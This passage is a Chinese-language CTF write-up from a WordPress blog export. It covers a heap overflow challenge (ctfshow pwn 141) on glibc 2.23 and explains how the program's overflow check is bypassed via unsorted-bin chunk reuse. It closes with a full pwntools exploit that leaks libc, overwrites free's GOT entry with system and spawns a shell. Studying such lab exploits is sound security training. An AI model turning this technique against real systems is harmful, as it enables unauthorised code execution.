data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Y2RTLDDBSBQ8T5UEDX6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"846\" height=\"411\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Y2RTLDDBSBQ8T5UEDX6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-264\"  sizes=\"auto, (max-width: 846px) 100vw, 846px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u3aeac269\">edit\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LFCY0YWVPJNG8GH36C7B-1024x585.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"585\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LFCY0YWVPJNG8GH36C7B-1024x585.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-265\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ubb22925e\">\u8fd9\u4e00\u53e5\u662f\u6ea2\u51fa\u68c0\u6d4b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SZBOEXVVDK65WHGQJJ.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"975\" height=\"42\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SZBOEXVVDK65WHGQJJ.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-266\"  sizes=\"auto, (max-width: 975px) 100vw, 975px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ubc1f1266\">\u770b\u8d77\u6765\u5c31\u975e\u5e38\u5947\u602a\uff0c\u6ea2\u51fa\u68c0\u6d4b\u901a\u5e38\u4e0d\u662f\u8fd9\u4e48\u641e\u7684\uff0c\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u662f\uff0c\u56e0\u4e3a\u662f\u5148\u7533\u8bf7\u7684description\u7684chunk\uff0c\u518d\u7533\u8bf7\u7684\u7ed3\u6784\u4f53\u7684chunk\uff0cdescription\u7684\u5730\u5740\u52a0\u4e0aedit\u7684size\u4e0d\u80fd\u8d8a\u8fc7\u7ed3\u6784\u4f53chunk\u7684\u5730\u5740\u3002\uff08\u56e0\u4e3a\u6309\u7406\u6765\u8bf4\u4ed6\u4eec\u662f\u7d27\u63a5\u7740\u7684\uff09<\/p>\n\n\n\n<p id=\"u94938bee\">\u90a3\u7ed5\u8fc7\u7684\u601d\u8def\u5c31\u662f\uff0c\u6211\u8ba9\u4ed6\u4eec\u4e0d\u6328\u7740\u4e0d\u5c31\u884c\u4e86\uff1f<\/p>\n\n\n\n<p id=\"u4e15e5b1\">\u672c\u9898\u73af\u5883\u662f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6NYD3R0_HCX7Z5SWHCSZS.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"951\" height=\"495\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6NYD3R0_HCX7Z5SWHCSZS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-267\"  sizes=\"auto, (max-width: 951px) 100vw, 951px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u5501c894\">\u67e5\u770blibc\u7248\u672c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed is-provider-sillyrabbit-039-s-blog wp-block-embed-sillyrabbit-039-s-blog\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/sillyrabbit.cn\/pwn\/%e5%90%84ubuntu%e7%89%88%e6%9c%ac%e5%af%b9%e5%ba%94%e7%9a%84libc%e7%89%88%e6%9c%ac\n<\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2T1EY9MXSL9XHYPTJPKL.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"645\" height=\"378\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2T1EY9MXSL9XHYPTJPKL.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-268\"  sizes=\"auto, (max-width: 645px) 100vw, 645px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u5f493a00\">2.23\uff0c\u8fd8\u6ca1\u6709tcache bin\uff0c\u518d\u672c\u5730\u6362\u4e00\u4e0blibc\uff1a<\/p>\n\n\n\n<p id=\"u70361ad7\">patchelf &#8211;set-interpreter \/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_i386\/ld-2.23.so pwn<\/p>\n\n\n\n<p id=\"u35abd568\">patchelf &#8211;replace-needed libc.so.6 \/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_i386\/libc-2.23.so pwn<\/p>\n\n\n\n<p id=\"uc480974c\">\u6ca1\u6709tcache bin\u7684\u8bdd\u5c31\u4e0d\u7528\u8003\u8651\u628a\u5b83\u586b\u6ee1\u7684\u64cd\u4f5c\u4e86\uff0c\u76f4\u63a5\u5c31\u80fd\u5230unsorted bin\u3002<\/p>\n\n\n\n<p id=\"u95a9d330\">\u6240\u4ee5\u5148add\u4e24\u4e2auser\uff0c\u7136\u540edelete user0\uff0c\u5b9e\u9645\u4e0a\u6267\u884c\u4e86\u4e24\u6b21free\uff0cuser0\u7684description\u6307\u9488\u548c\u5b83\u7684\u7ed3\u6784\u4f53\u6307\u9488\u4f1a\u5408\u5e76\u7136\u540e\u653e\u5165unsorted bin\u4e2d\uff0c\u6b64\u65f6\u518dadd\u4e00\u4e2auser2\uff0c\u7533\u8bf7\u4e00\u4e2a\u7b26\u5408\u5408\u5e76\u540e\u5927\u5c0f\u7684description\u5c31\u80fd\u62ff\u5230\u8fd9\u4e00\u6574\u5757chunk\uff0c\u7136\u540euser2\u7684\u7ed3\u6784\u4f53\u5c31\u4f1a\u8dd1\u5230\u4e0b\u9762\u53bb\uff0c\u7531\u4e8e\u4e0b\u9762\u8fd8\u6709\u4e00\u4e2auser1\uff0c\u6240\u4ee5user2\u7684description\u548c\u7ed3\u6784\u4f53\u6307\u9488\u5c31\u88abuser1\u9694\u79bb\u5f00\u4e86:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BHO86K1O_6V3B5B2S76H-1024x498.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"498\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BHO86K1O_6V3B5B2S76H-1024x498.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-269\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue91dc35f\">\u52a8\u6001\u8c03\u8bd5\uff1a<\/p>\n\n\n\n<p id=\"u4fd63cbe\">add(0x80,b&#8217;aaaa&#8217;,0x80,b&#8217;bbbb&#8217;)<\/p>\n\n\n\n<p id=\"ua181814d\">add(0x80,b&#8217;aaaa&#8217;,0x80,b&#8217;bbbb&#8217;)<\/p>\n\n\n\n<p id=\"uc810654d\">delete(0)<\/p>\n\n\n\n<p id=\"ua1ef9423\">\u6b64\u65f6heap\u5982\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/7GW07L8T7THXFAXS.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"849\" height=\"533\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/7GW07L8T7THXFAXS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-270\"  sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u067b39f3\">\u7136\u540e<\/p>\n\n\n\n<p id=\"u5a42cc75\">add user2\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SNIHAR984WZ3ZPSZK.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"488\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SNIHAR984WZ3ZPSZK.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-271\"  sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1B0JHJT_7V8BX75IW.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"756\" height=\"927\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1B0JHJT_7V8BX75IW.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-272\"  sizes=\"auto, (max-width: 756px) 100vw, 756px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1a11ae45\">\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u65f6user2\u7684description\u6307\u9488\u548c\u7ed3\u6784\u4f53\u6307\u9488\u7684\u4e24\u4e2achunk\u5df2\u7ecf\u88ab\u9694\u79bb\u4e86\uff0c\u4e5f\u5c31\u610f\u5473\u7740\u7ed5\u8fc7\u4e86\u6ea2\u51fa\u68c0\u6d4b\uff0c\u7136\u540eedit user2\u7684description\u5c31\u53ef\u4ee5\u6ea2\u51fa\u5230user1\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SPAPE0DWSOYE3WXT5I.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"686\" height=\"858\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SPAPE0DWSOYE3WXT5I.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-273\"  sizes=\"auto, (max-width: 686px) 100vw, 686px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/C44TPC1XDX7PJCWBLR_G.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"681\" height=\"867\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/C44TPC1XDX7PJCWBLR_G.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-274\"  sizes=\"auto, (max-width: 681px) 100vw, 681px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7753997d\">\u7136\u540e\u5c31\u662f\u5e38\u89c4\u64cd\u4f5c\u4e86\uff0c\u6cc4\u9732\u5e76\u8ba1\u7b97libc\u57fa\u5740\uff0c\u7b97\u51fasystem\u5730\u5740<\/p>\n\n\n\n<p id=\"u9de9e90d\">\uff0c\u6539free\u7684got\u503c\u4e3asystem\uff0c\u8c03\u7528\u4e00\u4e2a\u5185\u5bb9\u662fbinsh\u7684chunk\u5c31\u80fdgetshell\uff0c\u4f46\u662f\u6211\u8fd9\u65b0\u6dfb\u52a0\u4e00\u4e2achunk\u4f1a\u62a5\u9519\uff0c\u5e72\u8106\u5c31\u76f4\u63a5\u7528chunk2\uff1a<\/p>\n\n\n\n<p id=\"u139eca9d\">payload=binsh.ljust(0x108,b&#8217;\\x00&#8242;)+p32(110)+p32(0x89)+cyclic(0x80)+p32(0)+p32(0x89)+p32(elf.got[&#8216;free&#8217;])<\/p>\n\n\n\n<p id=\"ufe14908c\">\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext.log_level = \"info\"\n\nio = process(\"\/home\/monke\/ctfshowpwn\/pwn\")\n\n#io = remote('pwn.challenge.ctf.show', 28257)\n\nelf = ELF('\/home\/monke\/ctfshowpwn\/pwn')\n\nlibc = ELF('\/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_i386\/libc-2.23.so')\n\ndef add(size, name,length,text):\n\nio.sendlineafter(\"Action: \",b'0')\n\nio.sendlineafter(\"size of description: \",str(size))\n\nio.sendlineafter(\"name: \",name)\n\nio.sendlineafter(\"text length: \",str(length))\n\nio.sendlineafter(\"text: \",text)\n\ndef edit(idx, length,text):\n\nio.sendlineafter(\"Action: \",b'3')\n\nio.sendlineafter(\"index: \",str(idx))\n\nio.sendlineafter(\"text length: \",str(length))\n\nio.sendlineafter(\"text: \",text)\n\ndef delete(idx):\n\nio.sendlineafter(\"Action: \",b'1')\n\nio.sendlineafter(\"index: \",str(idx))\n\ndef show(idx):\n\nio.sendlineafter(\"Action: \",b'2')\n\nio.sendlineafter(\"index: \",str(idx))\n\nadd(0x80,b'aaaa',0x80,b'bbbb')\n\nadd(0x80,b'aaaa',0x80,b'bbbb')\n\ndelete(0)\n\n#gdb.attach(io)\n\nprint(elf.plt&#91;'free'])\n\nadd(0x108,b'aaaa',0x80,b'bbbb')\n\n#gdb.attach(io)\n\nbinsh=b'\/bin\/sh'\n\npayload=binsh.ljust(0x108,b'\\x00')+p32(110)+p32(0x89)+cyclic(0x80)+p32(0)+p32(0x89)+p32(elf.got&#91;'free'])\n\nedit(2,len(payload),payload)\n\n#gdb.attach(io)\n\nshow(1)\n\n#gdb.attach(io)\n\nio.recvuntil('description: ')\n\nfree_addr = u32(io.recv(4))\n\nprint(hex(free_addr))\n\nlibc_base = free_addr-libc.sym&#91;'free']\n\nprint(\"libc_base\",hex(libc_base))\n\nsystem_addr = libc_base+libc.sym&#91;'system']\n\nedit(1,0x8,p32(system_addr))\n\ndelete(2)\n\nio.interactive()<\/code><\/pre>\n\n\n\n<p id=\"u11dab9b4\"><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>pwn 141\uff08\u7b80\u5355UAF\uff09 \u7ecf\u5178\u83dc\u5355: add_note\uff1a del note\uff1afree\u5b8c\u4e0d\u60ac\u7a7a\uff0c\u6709UAF p [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[11],"class_list":["post-211","post","type-post","status-publish","format-standard","hentry","category-13","tag-11"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/211","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=211"}],"version-history":[{"count":7,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/211\/revisions"}],"predecessor-version":[{"id":542,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/211\/revisions\/542"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=211"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}